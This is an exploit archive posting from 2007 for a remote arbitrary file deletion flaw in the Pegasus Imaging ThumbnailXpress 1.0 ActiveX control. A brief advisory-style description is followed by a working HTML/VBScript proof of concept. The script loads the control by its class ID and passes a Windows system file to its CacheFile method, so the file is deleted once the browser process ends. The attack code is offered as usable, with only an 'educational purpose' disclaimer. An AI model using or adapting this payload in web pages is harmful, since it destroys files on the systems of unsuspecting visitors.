Home / exploits pegasus-delete.txt
Posted on 06 October 2007
<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>Pegasus Imaging ThumbnailXpress 1.0 Remote Arbitrary File Deletion</b> url: http://www.pegasusimaging.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 <b>Description: Component name: PegasusImaging.ActiveX.ThumbnailXpress1.dll Version: 1.0.45.0 This control contains an insecure "CacheFile()" method that delete, once the process is terminated, the file passed as argument.</b> ----------------------------------------------------------------------------- <object classid='clsid:F3379712-5D3C-4F57-92D9-09AC0657719A' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.CacheFile = "c:windowssystem_.ini" MsgBox "Exploit completed." End Sub </script> </span></span> </code></pre>